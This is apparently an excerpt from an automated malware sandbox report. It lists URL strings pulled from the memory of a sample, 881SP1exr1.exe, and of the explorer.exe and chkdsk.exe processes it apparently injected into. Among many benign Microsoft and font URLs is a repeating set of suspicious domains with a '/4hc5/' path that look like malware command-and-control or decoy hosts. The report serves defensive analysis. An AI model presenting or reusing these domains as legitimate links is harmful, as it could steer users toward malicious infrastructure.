          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.quailrun-inc.com/4hc5/www.bollywood.nexus
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.quailrun-inc.comReferer:
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.showshoe.info
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.showshoe.info/4hc5/
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.showshoe.info/4hc5/www.modluxenwa.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.showshoe.infoReferer:
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.slotjitu88.website
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.slotjitu88.website/4hc5/
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.slotjitu88.website/4hc5/www.iqixuehe.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.slotjitu88.websiteReferer:
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tcbbuilds.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tcbbuilds.com/4hc5/
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tcbbuilds.com/4hc5/www.therealnikib.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tcbbuilds.comReferer:
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.therealnikib.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.therealnikib.com/4hc5/
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.therealnikib.com/4hc5/www.slotjitu88.website
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.therealnikib.comReferer:
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.therenixgroupllc.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.therenixgroupllc.com/4hc5/
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.therenixgroupllc.com/4hc5/www.7141999.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.therenixgroupllc.comReferer:
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vurporn.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vurporn.com/4hc5/
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vurporn.com/4hc5/www.motionmixmedia.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vurporn.comReferer:
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000003.00000000.1656205865.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4099182802.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000003.00000000.1648506599.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000003.00000000.1648506599.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000003.00000000.1650634865.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106395909.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4094650297.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000003.00000000.1650634865.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106395909.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4094650297.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000003.00000002.4090581446.000000000370D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4088992932.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1645900730.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1646868780.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000003.3106395909.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4094650297.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1650634865.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000003.00000000.1650634865.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106395909.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4094650297.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000003.00000003.3106395909.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4094650297.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1650634865.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000003.00000000.1648506599.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000003.00000000.1648506599.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000003.00000000.1648506599.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000003.00000002.4103832201.000000001177F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
          Source: explorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
